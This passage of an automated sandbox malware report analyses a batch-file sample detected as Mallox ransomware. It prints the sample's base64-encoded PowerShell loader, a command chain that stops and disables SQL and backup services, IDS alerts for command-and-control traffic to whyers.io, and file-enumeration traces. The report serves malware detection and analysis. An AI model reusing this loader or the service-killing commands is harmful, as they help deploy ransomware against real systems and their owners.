disabled", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6780, ParentProcessName: cmd.exe, ProcessCommandLine: net stop "SQLSERVERAGENT" , ProcessId: 6708, ProcessName: net.exe
        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe, ProcessId: 5664, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nuy4k2he.4bu.ps1
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==, CommandLine|base64offset|contains: CB, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAH
        Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net stop "SQLSERVERAGENT" , CommandLine: net stop "SQLSERVERAGENT" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6780, ParentProcessName: cmd.exe, ProcessCommandLine: net stop "SQLSERVERAGENT" , ProcessId: 6708, ProcessName: net.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==, CommandLine|base64offset|contains: CB, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAH
        Source: Process startedAuthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: net stop "SQLSERVERAGENT" , CommandLine: net stop "SQLSERVERAGENT" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6780, ParentProcessName: cmd.exe, ProcessCommandLine: net stop "SQLSERVERAGENT" , ProcessId: 6708, ProcessName: net.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T07:42:41.112703+010020468261A Network Trojan was detected192.168.2.6644161.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T07:42:41.768028+010020468271A Network Trojan was detected192.168.2.64984413.248.169.48443TCP
        2025-02-11T07:42:42.964085+010020468271A Network Trojan was detected192.168.2.64985013.248.169.48443TCP
        2025-02-11T07:42:44.586520+010020468271A Network Trojan was detected192.168.2.64985913.248.169.48443TCP
        2025-02-11T07:42:48.950028+010020468271A Network Trojan was detected192.168.2.64986713.248.169.48443TCP
        2025-02-11T07:42:53.319402+010020468271A Network Trojan was detected192.168.2.64988713.248.169.48443TCP
        2025-02-11T07:42:54.230907+010020468271A Network Trojan was detected192.168.2.64990913.248.169.48443TCP
        2025-02-11T07:42:55.033991+010020468271A Network Trojan was detected192.168.2.64991513.248.169.48443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-11T07:42:42.128710+010020398151A Network Trojan was detected192.168.2.64984413.248.169.48443TCP
        2025-02-11T07:42:43.204644+010020398151A Network Trojan was detected192.168.2.64985013.248.169.48443TCP
        2025-02-11T07:42:44.735815+010020398151A Network Trojan was detected192.168.2.64985913.248.169.48443TCP
        2025-02-11T07:42:49.100789+010020398151A Network Trojan was detected192.168.2.64986713.248.169.48443TCP
        2025-02-11T07:42:53.475771+010020398151A Network Trojan was detected192.168.2.64988713.248.169.48443TCP
        2025-02-11T07:42:54.363400+010020398151A Network Trojan was detected192.168.2.64990913.248.169.48443TCP
        2025-02-11T07:42:55.176126+010020398151A Network Trojan was detected192.168.2.64991513.248.169.48443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: R1TftmQpuQ.batReversingLabs: Detection: 34%
        Source: R1TftmQpuQ.batVirustotal: Detection: 45%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406360 GetCommandLineW,CommandLineToArgvW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,StrDupW,LocalFree,QueryPerformanceCounter,GetTickCount,GetCurrentThreadId,GetCurrentProcessId,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,SetErrorMode,GetComputerNameA,GetWindowsDirectoryA,CreateFileA,GetFileTime,CloseHandle,FindFirstFileExW,GetLastError,CloseHandle,CreateThread,LocalFree,TerminateThread,GetModuleFileNameW,wnsprintfW,ExitProcess,10_2_00406360
        Source: unknownHTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:49844 version: TLS 1.2
        Source: Binary string: C:\Users\Administrator\Desktop\PureProducts\Builds\6ed9-0064-4a97-9c26-55a0-a5e2-4945\WindowsFormsApp1\bin\Release\Sapmrhaa.pdb source: R1TftmQpuQ.bat.exe, 00000004.00000002.2657659049.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2491514009.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: powershell.pdbUGP source: R1TftmQpuQ.bat.exe, 00000004.00000000.2094721092.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, R1TftmQpuQ.bat.exe.0.dr
        Source: Binary string: powershell.pdb source: R1TftmQpuQ.bat.exe, 00000004.00000000.2094721092.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, R1TftmQpuQ.bat.exe.0.dr
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: R1TftmQpuQ.bat.exe, 00000004.00000002.2692499417.0000000008660000.00000004.08000000.00040000.00000000.sdmp, R1TftmQpuQ.bat.exe, 00000004.00000002.2395167892.0000000005177000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: z:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: x:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: v:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: t:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: r:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: p:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: n:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: l:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: j:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: h:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: f:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: b:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: y:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: w:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: u:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: s:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: q:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: o:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: m:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: k:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: i:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: g:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: e:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: c:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: a:Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: number of queries: 1001
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406360 GetCommandLineW,CommandLineToArgvW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,StrDupW,LocalFree,QueryPerformanceCounter,GetTickCount,GetCurrentThreadId,GetCurrentProcessId,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,SetErrorMode,GetComputerNameA,GetWindowsDirectoryA,CreateFileA,GetFileTime,CloseHandle,FindFirstFileExW,GetLastError,CloseHandle,CreateThread,LocalFree,TerminateThread,GetModuleFileNameW,wnsprintfW,ExitProcess,10_2_00406360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00404F91 wnsprintfW,FindFirstFileExW,lstrcmpW,lstrcmpW,wnsprintfW,lstrcmpiW,lstrcmpiW,lstrcmpiW,StrStrIW,lstrlenW,lstrlenW,lstrcmpiW,StrStrIW,lstrlenW,lstrlenW,StrStrIW,lstrlenW,StrCmpNIW,lstrlenW,lstrcpyW,SleepEx,PostQueuedCompletionStatus,FindNextFileW,FindClose,wnsprintfW,10_2_00404F91
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040FF6F FindFirstFileExW,10_2_0040FF6F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DCJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\NULLJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\AcrobatJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdfJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\NULLJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Program Files\Adobe\Acrobat DC\NULLJump to behavior

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49850 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49844 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49859 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49867 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046826 - Severity 1 - ET MALWARE Mallox Ransomware CnC Domain (whyers .io) in DNS Lookup : 192.168.2.6:64416 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49909 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49887 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2046827 - Severity 1 - ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI : 192.168.2.6:49915 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49867 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49844 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49859 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49850 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49909 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49887 -> 13.248.169.48:443
        Source: Network trafficSuricata IDS: 2039815 - Severity 1 - ET MALWARE Win32/Filecoder.OJC CnC Checkin : 192.168.2.6:49915 -> 13.248.169.48:443
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: POST /QWEwqdsvsf/ap.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: whyers.ioContent-Length: 165Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: api.ipify.orgConnection: Keep-AliveCache-Control: no-cache
        Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
